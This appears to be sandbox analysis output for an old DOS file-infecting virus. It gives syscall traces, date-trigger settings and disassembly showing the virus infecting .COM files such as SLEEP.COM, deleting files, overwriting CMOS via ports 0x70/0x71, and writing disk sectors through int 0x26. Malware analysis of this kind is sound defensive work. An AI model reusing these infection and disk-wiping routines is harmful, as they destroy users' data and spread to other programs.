2018-12-25T12:41:54.41234721Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.419359224Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.421790878Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.423451395Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.426299114Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.428279497Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.431421839Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.439479104Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.447617549Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.450398725Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.457021994Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.463971481Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.465403988Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.466744012Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.469927842Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.47132856Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.474104126Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.482412524Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.490214134Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:54.491341336Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:54.494814745Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:54.496938589Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:54.49967826Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:54.506412643Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:54.72435021Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:54.726537698Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:54.738844298Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:54.740173164Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:54.746794284Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:54.753642634Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:54.760305505Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:54.762074839Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:54.765903008Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:54.768724045Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:54.770416381Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:54.773442578Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:54.788431026Z 62 PC: 12dab | Close file
2018-12-25T12:41:54.812896753Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.817357374Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.823772065Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.83042243Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.832811062Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.838164615Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.84108446Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.84364821Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.846592689Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.855993957Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.864283243Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.867679776Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.874745359Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.881471685Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.891819535Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.893459764Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.896341875Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.898501099Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.901132003Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.9094081Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.918673896Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.92146762Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.927923472Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.935120202Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.936758599Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.938389259Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.942189546Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.943878788Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.946455057Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.955629202Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.963445926Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.966224963Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.97328157Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.979841412Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.981463522Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.98368587Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.986724222Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.98830132Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.990753197Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.000082575Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.007608717Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.008497271Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.010469789Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.01262908Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.01473084Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:54.779540756Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:54.781704897Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:54.783194888Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:54.78470426Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:54.799450049Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:54.813504282Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:54.819925722Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:54.822531069Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:54.824046274Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:54.82690109Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:54.828518086Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:54.832094515Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:54.853690365Z 62 PC: 12dab | Close file
2018-12-25T12:41:54.863962622Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.8682073Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.874657955Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.881130067Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.883948237Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.886290423Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.88917715Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.891492237Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.894147675Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.902536275Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.911504306Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.917116942Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.923531178Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.929999085Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.932501659Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.934275256Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.939029904Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.941899794Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.944670638Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.953041608Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.976371129Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.979047737Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.985734429Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.998849213Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.000366631Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.001928028Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.004985096Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.007319637Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.009968267Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.018319108Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.027110529Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.029664095Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.036046742Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.042737814Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.044326903Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.04586654Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.049470568Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.050888472Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.053155239Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.062159024Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.06995341Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.070965345Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.07313528Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.075875777Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.077851218Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:55.083429727Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":8,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:54.789931189Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:54.791480981Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:54.79256162Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:54.793627707Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:54.799882986Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:54.806667157Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:54.813072313Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:54.814679557Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:54.820762124Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:54.82437109Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:54.826428527Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:54.83213139Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:54.853554406Z 62 PC: 12dab | Close file
2018-12-25T12:41:54.86196327Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.86528326Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.871967609Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.87843019Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.880918679Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.882602128Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.885520991Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.888262273Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.890780422Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.899039966Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.908041809Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.910915898Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.917575086Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.924291219Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.926259814Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.928601593Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.931503857Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.933612606Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.936278611Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.944632216Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.953355723Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.955939898Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.962343925Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.969159609Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.970624679Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.971991649Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.977581602Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.978998407Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.981689934Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.990564461Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.999517789Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.002339604Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.009560901Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.016014557Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.017629743Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.020088799Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.023273284Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.024870226Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.028185864Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.036866806Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.044864044Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.04632994Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.049397134Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.051749094Z 25 PC: 12b3f | Get default drive
2018-12-25T12:41:55.054850541Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.058231248Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:55.067597051Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.059081859Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:55.060945312Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:55.062600947Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:55.064380134Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:55.072133525Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.082856856Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.089750861Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.091178605Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.093300711Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.096063392Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:55.097510247Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.104604881Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.120852856Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.12953317Z 79 PC: 12ad1 | Find next file (See above)
